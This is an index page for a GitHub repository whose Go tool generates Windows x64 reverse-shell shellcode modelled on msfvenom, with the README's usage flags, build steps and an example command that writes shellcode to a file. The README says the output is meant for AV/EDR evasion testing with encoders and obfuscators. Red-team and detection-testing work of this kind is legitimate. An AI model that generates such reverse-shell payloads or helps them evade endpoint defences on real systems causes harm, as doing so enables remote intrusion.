Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/nchgroup/shell_reverse_tcp
msfvenom windows/x64/shell_reverse_tcp payload generator without dependencies
https://github.com/nchgroup/shell_reverse_tcp
backdoor go golang malware metasploit msfvenom payload reverse reverse-shell shellcode
Last synced: 24 days ago
JSON representation
msfvenom windows/x64/shell_reverse_tcp payload generator without dependencies
- Host: GitHub
- URL: https://github.com/nchgroup/shell_reverse_tcp
- Owner: nchgroup
- License: mit
- Created: 2025-01-03T21:58:15.000Z (about 1 month ago)
- Default Branch: main
- Last Pushed: 2025-01-16T21:40:49.000Z (25 days ago)
- Last Synced: 2025-01-16T22:31:31.273Z (25 days ago)
- Topics: backdoor, go, golang, malware, metasploit, msfvenom, payload, reverse, reverse-shell, shellcode
- Language: Go
- Homepage:
- Size: 10.7 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# shell_reverse_tcp
msfvenom windows/x64/shell_reverse_tcp payload generator without dependencies# Help
```
$ ./shell_reverse_tcp -h
Usage of ./shell_reverse_tcp:
-format string
Format: {raw, hex, base64} (default "raw")
-host string
Host IP address (default "127.0.0.1")
-port int
Port number (0-65535) (default 4444)
```## Example
```
$ ./shell_reverse_tcp -host 192.168.1.2 -port 4444 -format raw > shellcode.bin
```# Build
```bash
git clone https://github.com/nchgroup/shell_reverse_tcp
cd shell_reverse_tcp/
go build .
```# Project spirit
Generate your payload in x64 quickly and easily without dependencies to perform AV/EDR evasion tests on Windows in amd64, so you can use encoders, ciphers, obfuscators, whatever.# ToDo
* add language support, example: `-lang c`# References
* https://vay3t.medium.com/malware-development-generando-shellcodes-de-metasploit-sin-metasploit-aa120ffcdd92
* https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/windows/x64/shell_bind_tcp.rb#L47
* https://github.com/vay3t/asm-shell_reverse_tcp# Authors
* [Huerfano](https://www.linkedin.com/in/leonardo-astorga-20b1095a/)
* [Vay3t](https://vay3t.org)